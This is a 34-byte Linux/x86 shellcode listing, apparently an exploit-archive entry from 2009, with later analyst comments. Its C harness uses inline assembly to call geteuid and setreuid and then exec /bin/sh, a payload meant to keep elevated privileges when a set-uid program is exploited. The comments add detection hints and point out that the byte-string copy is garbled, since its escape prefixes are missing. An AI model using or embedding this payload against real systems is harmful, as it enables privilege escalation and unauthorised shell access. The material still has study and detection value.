
# Title : linux/x86 setreuid(geteuid(),geteuid()),execve("/bin/sh",0,0) 34 bytes
# Published : 2009-06-16
# Author : blue9057


/*
 *
 * linux/x86 setreuid(geteuid(),geteuid()),execve("/bin/sh",0,0) 34byte universal shellcode
 *
 * blue9057 root@blue9057.com
 *
 */
// Demonstration harness for a 34-byte Linux/x86 (32-bit, int $0x80 ABI) payload.
// It issues three system calls in sequence: geteuid(), setreuid(euid, euid),
// then execve("//bin/sh", NULL, NULL).
//
// Analyst notes:
//  - Setting the real uid equal to the effective uid before spawning the shell
//    matters only when the two differ, i.e. in a set-uid context.
//  - For detection, the syscall sequence geteuid -> setreuid(x, x) -> execve of a
//    shell is a recognisable pattern in syscall audit logs; logging execve calls
//    made while real and effective uid differ will surface it.
//  - The inline asm declares no clobbers although it overwrites eax/ebx/ecx/edx
//    and moves esp. That is tolerable only because a successful execve never
//    returns to the compiled code.
int main()
{
    // Byte-string form of the same instructions (34 opcodes, matching the title).
    // NOTE(review): as it appears on this page the "\x" escape prefixes are missing
    // (presumably lost in extraction), so this literal is plain ASCII text rather
    // than machine code. The array is also never referenced below; only the inline
    // asm is executed.
    char shellcode[]="x6ax31x58x99xcdx80x89xc3x89xc1x6ax46"
                              "x58xcdx80xb0x0bx52x68x6ex2fx73x68x68"
                              "x2fx2fx62x69x89xe3x89xd1xcdx80";
    // Equivalent C: setreuid(geteuid(), geteuid());
    //               execve("/bin/sh", 0, 0);
    __asm__(""
            "push $0x31;"       // push/pop loads eax = 0x31 (geteuid) with no NUL bytes
            "pop %eax;"
            "cltd;"             // sign-extend eax into edx; eax is positive, so edx = 0
            "int $0x80;"        // geteuid(); result returned in eax
            "mov %eax, %ebx;"   // arg1 (ruid) = effective uid
            "mov %eax, %ecx;"   // arg2 (euid) = effective uid
            "push $0x46;"       // eax = 0x46 (setreuid)
            "pop %eax;"
            "int $0x80;"        // setreuid(geteuid(),geteuid());
            "mov $0xb, %al;"    // al = 0xb (execve); only correct if setreuid left eax == 0 (success)
            "push %edx;"        // edx is still 0: pushes the string's NUL terminator
            "push $0x68732f6e;" // "n/sh" (little-endian)
            "push $0x69622f2f;" // "//bi" -> stack now holds "//bin/sh\0"
            "mov %esp, %ebx;"   // arg1 = pointer to the path string on the stack
            "mov %edx, %ecx;"   // arg2 (argv) = NULL; edx (envp) is already NULL
            "int $0x80;"        // execve("/bin/sh",0,0);
            "");
}
